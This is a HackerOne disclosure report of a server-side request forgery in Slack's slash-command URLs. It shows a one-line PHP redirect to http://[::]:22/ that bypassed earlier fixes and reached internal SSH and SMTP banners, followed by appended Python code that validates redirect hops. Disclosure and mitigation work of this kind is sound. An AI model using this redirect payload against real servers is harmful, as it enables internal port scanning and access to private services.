Slack: SSRF in api.slack.com, using slash commands and bypassing the protections.

2018-07-13T03:38:51
ID H1:381129
Type hackerone
Reporter elber
Modified 2019-02-22T20:58:21

Description

This bypasses the fixes for reports #61312 and #356765.

Tutorial:

Go to api.slack.com and create an application with your own slash command. {F320014}

Enter your own domain as the command's URL, and on that domain create index.php containing:

<?php header("location: http://[::]:22/"); ?>

so that the server answers with the response header:

location: http://[::]:22/

{F320019}

And save.

Go to your Slack workspace and type /youslash

Try with my server http://206.189.204.187/

Results:

SSH {F320015}

SMTP {F320016}
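A defensive check for the redirect trick above, added here as an example and not code from Slack or from the reporter: the initial request URL and every Location header are validated before they are followed, so a hop to the unspecified address [::] (or 0.0.0.0, loopback, private, link-local or IPv4-mapped literals) is refused. The redirect chain below is constructed from the report, and the port allow-list is an assumption.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # assumed policy: webhooks only talk to web ports


def is_blocked_ip(ip):
    """True for any literal address an outbound request must never reach.

    is_unspecified covers the [::] / 0.0.0.0 bypass from the report; loopback,
    RFC 1918 / ULA, link-local (cloud metadata) and reserved ranges are also
    refused. IPv4-mapped IPv6 literals (::ffff:127.0.0.1) are unwrapped first.
    """
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_unspecified or ip.is_loopback or ip.is_private
            or ip.is_link_local or ip.is_multicast or ip.is_reserved)


def check_target(url):
    """Validate one hop of an outbound request. Returns (ok, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # brackets around IPv6 literals are stripped here
    if not host:
        return False, "empty host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a DNS name: resolve and re-check every A/AAAA record
    if ip is not None and is_blocked_ip(ip):
        return False, f"address {ip} is internal or unspecified"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    return True, "ok"


def follow_chain(start, locations):
    """Check the first URL and each Location header an HTTP client would follow."""
    for url in [start, *locations]:
        ok, why = check_target(url)
        if not ok:
            return False, f"{url}: {why}"
    return True, "ok"


# Constructed chain matching the report: public host, then redirect to [::]:22
CHAIN = ("http://206.189.204.187/index.php", ["http://[::]:22/"])
```

A client that follows redirects automatically never sees the intermediate Location header, so the check must run in a redirect loop that the client controls, hop by hop.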

Impact

In a Server-Side Request Forgery (SSRF) attack, the attacker abuses functionality on the server to read or update internal resources, scan internal ports, and obtain the version banners of the services running on the server.

References:

https://www.owasp.org/index.php/Server_Side_Request_Forgery
https://hackerone.com/reports/61312